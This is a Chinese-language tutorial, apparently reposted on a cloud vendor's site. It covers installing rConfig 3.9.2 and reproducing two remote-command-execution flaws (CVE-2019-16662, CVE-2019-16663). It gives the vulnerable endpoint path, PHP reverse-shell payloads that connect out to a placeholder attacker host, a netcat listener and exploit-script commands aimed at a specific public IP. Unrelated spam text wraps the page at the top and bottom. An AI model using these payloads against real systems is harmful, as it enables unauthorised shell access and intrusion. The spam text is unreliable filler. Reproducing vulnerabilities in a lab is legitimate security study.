91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行rConfig-CVE漏洞復現及環境搭建

發布時間:2021-12-10 16:32:24 來源:億速云 閱讀:486 作者:柒染 欄目:大數據

今天就跟大家聊聊有關如何進行rConfig-CVE漏洞復現及環境搭建,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

rConfig是一個開放源代碼的網絡設備配置管理實用程序,網絡工程師可以使用它來頻繁獲取其網絡設備的配置快照。rConfig是唯一的,因為您選擇要針對設備運行的命令。

只需使用要應用于設備類別的命令列表配置rConfig,然后將設備添加到該類別。創建一個計劃任務,其余工作由rConfig完成。現在,rConfig版本3具有配置符合性管理實用程序,使您可以監視設備配置以符合策略。

如何進行rConfig-CVE漏洞復現及環境搭建

一、環境搭建

rConfig安裝

cd /home

curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"

chmod +x install_rConfig.sh

./install_rConfig.sh

如何進行rConfig-CVE漏洞復現及環境搭建

如何進行rConfig-CVE漏洞復現及環境搭建

運行文件安裝發現報錯 我們打開源碼看看為什么連接不上

如何進行rConfig-CVE漏洞復現及環境搭建

結果發現會curl訪問一下谷歌來判斷是否有網 我們可以直接改成www.baidu.com,但是后面安裝可能會剛問一寫被墻的連接,所以我們保險起見,掛個代理把!!!我這里用的是proxychains4代理的我內網的一個ss。

如何進行rConfig-CVE漏洞復現及環境搭建

然后就可以直接正常安裝了。

如何進行rConfig-CVE漏洞復現及環境搭建

安裝完成之后會有一個centos7_postReboot.sh文件

如何進行rConfig-CVE漏洞復現及環境搭建

我們接著運行一下 就可以看見已經安裝完成了。剩下就去web頁面配置了。

如何進行rConfig-CVE漏洞復現及環境搭建

進入https://192.168.157.130/install頁面進行后續安裝

如何進行rConfig-CVE漏洞復現及環境搭建

如何進行rConfig-CVE漏洞復現及環境搭建

如何進行rConfig-CVE漏洞復現及環境搭建

 

到此安裝均已完成,默認賬號密碼為admin admin。

二、漏洞復現

rConfig 3.9.2及更低版本中的未經身份驗證的命令執行漏洞。安裝后,安裝目錄不會自動刪除,這允許未經身份驗證的用戶通過ajaxServerSettingsChk.php文件作為Web服務器用戶執行任意命令。

CVE-2019-16662 rConfig3.9.2遠程命令執行漏洞復現:

為了直觀,我自己在服務器上搭建了一個rConfig3.9.2系統,現在我們來抓包復現一下漏洞

如何進行rConfig-CVE漏洞復現及環境搭建

我們將路徑替換成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=

如何進行rConfig-CVE漏洞復現及環境搭建

下面我們需要將命令執行一道url編碼 然后再填入參數即可。

如何進行rConfig-CVE漏洞復現及環境搭建

如何進行rConfig-CVE漏洞復現及環境搭建

已經輸出了我們的回顯,現在我們來彈個shell試一下

將url編碼;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何進行rConfig-CVE漏洞復現及環境搭建

另一個外網服務器進行監聽 nc -lvnp 6633

如何進行rConfig-CVE漏洞復現及環境搭建

添加參數發送請求,可以看到已經反彈到shell了。

如何進行rConfig-CVE漏洞復現及環境搭建

CVE-2019-16662Exp腳本利用

如何進行rConfig-CVE漏洞復現及環境搭建

python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634

如何進行rConfig-CVE漏洞復現及環境搭建

CVE-2019-16663 rConfig3.9.2遠程命令執行漏洞復現

這個RCE需要身份驗證才能執行,存在lib/crud/search.crud.php這個文件里。

如何進行rConfig-CVE漏洞復現及環境搭建

登錄成功之后進行抓包 替換成RCE的路徑 將反彈shell的payload進行編碼

""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何進行rConfig-CVE漏洞復現及環境搭建

監聽,反彈,成功

如何進行rConfig-CVE漏洞復現及環境搭建

CVE-2019-16663 EXP利用

如何進行rConfig-CVE漏洞復現及環境搭建

python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636

如何進行rConfig-CVE漏洞復現及環境搭建

CVE-2019-19509 rConfig3.9.3遠程命令執行漏洞

由于3.9.3的安裝包被官方刪除和下架了,現在無法復現,但網上已有Exp。

如何進行rConfig-CVE漏洞復現及環境搭建

看完上述內容,你們對如何進行rConfig-CVE漏洞復現及環境搭建有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

延寿县| 军事| 伊春市| 仁寿县| 武安市| 慈溪市| 常山县| 利津县| 页游| 上高县| 天台县| 洮南市| 来凤县| 和顺县| 内江市| 南丹县| 金寨县| 西吉县| 旌德县| 崇左市| 红河县| 宝坻区| 神农架林区| 黄梅县| 珠海市| 江川县| 涿鹿县| 阿尔山市| 卢氏县| 桂平市| 兴仁县| 时尚| 方山县| 灵武市| 泸溪县| 兰溪市| 太仓市| 禹城市| 九江市| 江源县| 布拖县|